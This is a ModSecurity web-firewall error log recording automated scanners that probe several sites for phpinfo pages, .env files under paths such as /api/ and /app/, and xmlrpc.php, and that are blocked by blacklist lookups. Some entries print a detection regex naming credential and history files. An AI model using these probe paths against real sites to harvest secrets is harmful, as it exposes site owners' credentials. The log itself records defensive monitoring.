[Tue May 26 14:01:47.420207 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnLAAACzM"]
[Tue May 26 14:01:47.426649 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnMwAACyY"]
[Tue May 26 14:01:47.426927 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnJAAACyg"]
[Tue May 26 14:01:47.454605 2026] [security2:error] [pid 578581:tid 578722] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVacpm_8al1sb-umPtnNAAACzE"]
[Tue May 26 14:01:47.543378 2026] [security2:error] [pid 578581:tid 578632] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVac5m_8al1sb-umPtnTwAAGjI"]
[Tue May 26 14:01:47.551124 2026] [security2:error] [pid 578581:tid 578627] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVac5m_8al1sb-umPtnUgAAGi0"]
[Tue May 26 14:01:47.612126 2026] [security2:error] [pid 578581:tid 578648] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/api/.env"] [unique_id "ahVac5m_8al1sb-umPtnWQAAGkI"]
[Tue May 26 14:01:47.612154 2026] [security2:error] [pid 578581:tid 578634] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/api-backend/.env"] [unique_id "ahVac5m_8al1sb-umPtnVwAAGjQ"]
[Tue May 26 14:01:47.612291 2026] [security2:error] [pid 578581:tid 578641] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/api-node/.env"] [unique_id "ahVac5m_8al1sb-umPtnVgAAGjs"]
[Tue May 26 14:01:47.613689 2026] [security2:error] [pid 578581:tid 578716] [client 129.222.147.134:55040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVac5m_8al1sb-umPtnWwAAAAU"]
[Tue May 26 14:01:47.613807 2026] [security2:error] [pid 578581:tid 578716] [client 129.222.147.134:55040] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVac5m_8al1sb-umPtnWwAAAAU"]
[Tue May 26 14:01:47.908633 2026] [security2:error] [pid 578581:tid 578640] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/administrator/.env"] [unique_id "ahVac5m_8al1sb-umPtnVQAAGjo"]
[Tue May 26 14:01:48.165746 2026] [security2:error] [pid 578581:tid 578809] [client 4.193.189.92:1360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/chosen.php"] [unique_id "ahVadJm_8al1sb-umPtndAAAAGI"]
[Tue May 26 14:01:48.303516 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnSQAAGi4"]
[Tue May 26 14:01:48.306765 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnSgAAGjA"]
[Tue May 26 14:01:48.338710 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnSwAAGi8"]
[Tue May 26 14:01:48.370274 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnTAAAGik"]
[Tue May 26 14:01:48.372147 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnTQAAGho"]
[Tue May 26 14:01:48.391869 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnUQAAGjk"]
[Tue May 26 14:01:48.393005 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnTgAAGjc"]
[Tue May 26 14:01:48.395895 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnYQAAGko"]
[Tue May 26 14:01:48.403026 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnYgAAGkY"]
[Tue May 26 14:01:48.405025 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnWAAAGjg"]
[Tue May 26 14:01:48.405701 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnUAAAGiU"]
[Tue May 26 14:01:48.417398 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnXgAAGkQ"]
[Tue May 26 14:01:48.423721 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtncQAAGlI"]
[Tue May 26 14:01:48.427569 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnXQAAGjw"]
[Tue May 26 14:01:48.432133 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnYwAAGk4"]
[Tue May 26 14:01:48.437773 2026] [security2:error] [pid 578581:tid 578737] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVac5m_8al1sb-umPtnVAAAGis"]
[Tue May 26 14:01:48.516955 2026] [security2:error] [pid 578581:tid 578645] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/api/info.php"] [unique_id "ahVadJm_8al1sb-umPtnhQAAID8"]
[Tue May 26 14:01:48.577616 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnggAAIFs"]
[Tue May 26 14:01:48.592010 2026] [security2:error] [pid 578581:tid 578684] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/api/phpinfo.php"] [unique_id "ahVadJm_8al1sb-umPtniwAAIGY"]
[Tue May 26 14:01:48.890566 2026] [security2:error] [pid 578581:tid 578739] [client 4.193.189.92:3098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/doc.php"] [unique_id "ahVadJm_8al1sb-umPtnmwAAABw"]
[Tue May 26 14:01:49.278900 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtngQAAID4"]
[Tue May 26 14:01:49.287156 2026] [security2:error] [pid 578581:tid 578713] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnmgAAAAI"]
[Tue May 26 14:01:49.310034 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtngwAAIE0"]
[Tue May 26 14:01:49.367132 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnhgAAIEk"]
[Tue May 26 14:01:49.369162 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtniAAAIGE"]
[Tue May 26 14:01:49.378877 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnhAAAIEM"]
[Tue May 26 14:01:49.383922 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnhwAAIEg"]
[Tue May 26 14:01:49.395344 2026] [security2:error] [pid 578581:tid 578661] [remote 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnjAAAIE8"]
[Tue May 26 14:01:49.396054 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnlAAAIEA"]
[Tue May 26 14:01:49.401842 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtniQAAIFw"]
[Tue May 26 14:01:49.403653 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnjgAAIFE"]
[Tue May 26 14:01:49.407992 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnjQAAIEs"]
[Tue May 26 14:01:49.412118 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnlQAAIFA"]
[Tue May 26 14:01:49.414530 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnlwAAIFg"]
[Tue May 26 14:01:49.416718 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnigAAIFY"]
[Tue May 26 14:01:49.418733 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnkAAAIFk"]
[Tue May 26 14:01:49.472404 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadJm_8al1sb-umPtnjwAAIGY"]
[Tue May 26 14:01:49.546481 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnrgAAIFc"]
[Tue May 26 14:01:49.580215 2026] [security2:error] [pid 578581:tid 578675] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/apis/.env"] [unique_id "ahVadZm_8al1sb-umPtnuQAAIF0"]
[Tue May 26 14:01:49.595752 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtntAAAIFo"]
[Tue May 26 14:01:49.619385 2026] [security2:error] [pid 578581:tid 578691] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/app/.env"] [unique_id "ahVadZm_8al1sb-umPtnvgAAIG0"]
[Tue May 26 14:01:49.651096 2026] [security2:error] [pid 578581:tid 578782] [client 4.193.189.92:6461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/elp.php"] [unique_id "ahVadZm_8al1sb-umPtnxgAAAEc"]
[Tue May 26 14:01:49.832800 2026] [security2:error] [pid 578581:tid 578803] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnrQAAAFw"]
[Tue May 26 14:01:50.364403 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnvwAAIG8"]
[Tue May 26 14:01:50.367167 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnvQAAIGg"]
[Tue May 26 14:01:50.367522 2026] [security2:error] [pid 578581:tid 578724] [client 4.193.189.92:6454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/Exception-class.php"] [unique_id "ahVadpm_8al1sb-umPtn4QAAAA0"]
[Tue May 26 14:01:50.368525 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnwAAAIAU"]
[Tue May 26 14:01:50.370699 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnwQAAIGo"]
[Tue May 26 14:01:50.375462 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnuwAAIG4"]
[Tue May 26 14:01:50.386905 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnwgAAIA0"]
[Tue May 26 14:01:50.394458 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnugAAIGc"]
[Tue May 26 14:01:50.396780 2026] [security2:error] [pid 578581:tid 578743] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVadZm_8al1sb-umPtnvAAAIGU"]
